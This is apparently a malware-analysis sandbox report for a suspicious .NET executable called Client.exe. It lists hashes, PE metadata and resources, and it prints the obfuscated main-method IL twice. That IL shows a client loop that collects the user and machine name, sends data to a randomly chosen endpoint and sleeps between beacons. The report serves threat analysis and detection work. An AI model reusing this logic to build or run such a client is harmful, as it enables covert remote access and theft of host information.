Suspicious
Suspect

65eabb0907e9203ada9b06536bff98ed

PE Executable
|
MD5: 65eabb0907e9203ada9b06536bff98ed
|
Size: 516.11 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
65eabb0907e9203ada9b06536bff98ed
Sha1
9ae2ea215199833d5c518fb1b217c735bf9f2c7c
Sha256
f2c36ce0cd70a12aa17e902fb67b72cd1b1859c7b2b36dd3c9f6d43f54e58c5c
Sha384
3d57b94c34e2c2e7f812b9cb2898b07cdd2bc087e29958de1443b3dbe5a965b3a1947db37d79d206a557c975af8c56b1
Sha512
f23a4c92f1a8ed8d42306bcbe9c264509c2baee80f7fe9ae34a2cacd3f2caafe5150556b70c8bb13ba7c62fb87f4427f911a38be93c3186505e4ceffdac9aaa2
SSDeep
12288:gOD3qWMY19enG6fgCqvWb17Uw3uooO7Qn:lInxg+p7Uw/8n
TLSH
2EB419257FA98E00D590187ECA7E3A09CB16E0F125026347370AF7A25D459EEDE2D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
65eabb0907e9203ada9b06536bff98ed
[Rebuild from dump]_32966032.exe
.Net Resources
j9wpr711d4nqjj
12zqw6tnuwh
Informations
Name
 Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK
Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_32966032.exe
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

600
Main Method

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::CyhYWnGFinUmYYVjXsvCqBhc() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::NxJvqNIZmmhzw() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EENrfOsuhM() stloc V_3 nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yplKFBQENJpwJsaMNlmojaqr() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() br IL_000E: nop call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() call System.Void fNfyoRBBghVJGXvPKIQl.boUsWiWGUcFfJuVvXUUpGYA::wsXNMEfJuAqVdNIWVKiM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ERelKhLQtE call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::lGALCbwrKutfvD() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Void xghyPQiPgfOltUiCaaRYaWyT.NmtFPrBwmJqmydImB::ncFeENDrQvlFGNYmM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Boolean fDDzULvQBKYMpVBDSnqsbyV.nKRLKVWdVinuVJSQrPXjHUkE::VzrLRGTFxvxjnrndWIe(System.String) brtrue IL_0080: call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() leave IL_0283: ret call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() call System.Void xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::hRENhVgVOAazWo() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brtrue IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::DOELbWafTEHhFaXPuXZQYrtTV call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::dJCOSTQxAsYWOhkQuitOIDyFB() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::IuYLXytMcrOqvpYzJAC() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yEBXprxcpZKwMnKVYpUZdB() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::tCEnDpJtyCL() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtBVfBQXCgRdHfDaTfdM() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::zIUlEunffMuBGGcWUoXMeDMk() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::fXmiaTZzkEkgkbHdsW() ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XcBZaEyqFzSwwkKY() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::AwFsUCWBspkNPjlg() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::MyeyLeccTzRHnwZClcvQbDZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XuDpYndcaJEphODykCEg() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XiOOdqQgPEXMuYpSdQB() ldelem System.String ldloc V_2 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::rbICZpAYVxjsXOXCgQOlqLYq(System.String,System.String) ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brfalse IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::yphxJsTsUVrk ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XeYcNSDUVFUfzYnIswpfowA ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtEtKKeGqP() newarr System.Object dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JYzacQNzdjlsjY() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KfGWZTZYPRfOfY() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INmdnLCXadeUDS() call System.Byte[] xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::brCptOgDSVZarFUgaBrPJ() stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JpzoNnuxMBPRX() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::nhndqtJsqHvWXz stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::TBUUxCRUNcEHBYx() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IareIZnJQXqyVFofWUk stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::wJhRZvsvKZNPabYueDHcJzGPu() call System.String System.Environment::get_UserName() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LpGkRETTQelpK() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cXjGmVAOFFjFtXJZJYpBul() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rrNBVymSLoPE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KdxRUpwDRXk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::EDLrHWDiciJGkrUPrEGE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::ULEnrPLWSKYKjSj() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::XmKbaOBUdwvJVprsuohpXOJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::hatvqTYdoEfZJCSiIEoNFk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::YOSIdGgqHjSKLmJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::liPlAEniBFGVqepcAnbynkmNP() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::vkHRCTkJzsh stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::qBeeWkxcHMaiYZBVdTCgbDT() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::xKKTuuVDiwAsFaLVkpLis stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::naelKBvCVINlDXjVYN() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ZZnujpBSvoaanltCfTIza stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cBSPBxRGSKjQniCqv() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rFPiVBumnrBY stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LSFRYMPLPSFk() call System.String xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::bqKlWClqwHYQZqUN() stelem.ref <null> call System.Byte[] wQYsWkdVzGrayjetPsy.zXtkNqddifrOSat::vGxTDUUCJs(System.Object[]) callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::sTZioycnfldvOD(System.Byte[]) call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

600
Main Method

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::CyhYWnGFinUmYYVjXsvCqBhc() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::NxJvqNIZmmhzw() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EENrfOsuhM() stloc V_3 nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yplKFBQENJpwJsaMNlmojaqr() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() br IL_000E: nop call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() call System.Void fNfyoRBBghVJGXvPKIQl.boUsWiWGUcFfJuVvXUUpGYA::wsXNMEfJuAqVdNIWVKiM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ERelKhLQtE call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::lGALCbwrKutfvD() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Void xghyPQiPgfOltUiCaaRYaWyT.NmtFPrBwmJqmydImB::ncFeENDrQvlFGNYmM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Boolean fDDzULvQBKYMpVBDSnqsbyV.nKRLKVWdVinuVJSQrPXjHUkE::VzrLRGTFxvxjnrndWIe(System.String) brtrue IL_0080: call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() leave IL_0283: ret call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() call System.Void xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::hRENhVgVOAazWo() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brtrue IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::DOELbWafTEHhFaXPuXZQYrtTV call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::dJCOSTQxAsYWOhkQuitOIDyFB() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::IuYLXytMcrOqvpYzJAC() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yEBXprxcpZKwMnKVYpUZdB() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::tCEnDpJtyCL() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtBVfBQXCgRdHfDaTfdM() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::zIUlEunffMuBGGcWUoXMeDMk() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::fXmiaTZzkEkgkbHdsW() ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XcBZaEyqFzSwwkKY() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::AwFsUCWBspkNPjlg() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::MyeyLeccTzRHnwZClcvQbDZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XuDpYndcaJEphODykCEg() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XiOOdqQgPEXMuYpSdQB() ldelem System.String ldloc V_2 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::rbICZpAYVxjsXOXCgQOlqLYq(System.String,System.String) ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brfalse IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::yphxJsTsUVrk ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XeYcNSDUVFUfzYnIswpfowA ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtEtKKeGqP() newarr System.Object dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JYzacQNzdjlsjY() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KfGWZTZYPRfOfY() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INmdnLCXadeUDS() call System.Byte[] xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::brCptOgDSVZarFUgaBrPJ() stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JpzoNnuxMBPRX() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::nhndqtJsqHvWXz stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::TBUUxCRUNcEHBYx() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IareIZnJQXqyVFofWUk stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::wJhRZvsvKZNPabYueDHcJzGPu() call System.String System.Environment::get_UserName() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LpGkRETTQelpK() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cXjGmVAOFFjFtXJZJYpBul() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rrNBVymSLoPE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KdxRUpwDRXk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::EDLrHWDiciJGkrUPrEGE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::ULEnrPLWSKYKjSj() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::XmKbaOBUdwvJVprsuohpXOJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::hatvqTYdoEfZJCSiIEoNFk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::YOSIdGgqHjSKLmJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::liPlAEniBFGVqepcAnbynkmNP() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::vkHRCTkJzsh stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::qBeeWkxcHMaiYZBVdTCgbDT() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::xKKTuuVDiwAsFaLVkpLis stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::naelKBvCVINlDXjVYN() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ZZnujpBSvoaanltCfTIza stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cBSPBxRGSKjQniCqv() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rFPiVBumnrBY stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LSFRYMPLPSFk() call System.String xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::bqKlWClqwHYQZqUN() stelem.ref <null> call System.Byte[] wQYsWkdVzGrayjetPsy.zXtkNqddifrOSat::vGxTDUUCJs(System.Object[]) callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::sTZioycnfldvOD(System.Byte[]) call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI pop <null> leave IL_0283: ret ret <null>
Artefacts
Name
 Value
PE Layout

MemoryMapped (process dump suspected)
PE Layout

MemoryMapped (process dump suspected)
65eabb0907e9203ada9b06536bff98ed (516.11 KB)
File Structure
65eabb0907e9203ada9b06536bff98ed
[Rebuild from dump]_32966032.exe
.Net Resources
j9wpr711d4nqjj
12zqw6tnuwh
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
PE Layout

MemoryMapped (process dump suspected)

65eabb0907e9203ada9b06536bff98ed
PE Layout

MemoryMapped (process dump suspected)

65eabb0907e9203ada9b06536bff98ed > [Rebuild from dump]_32966032.exe
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙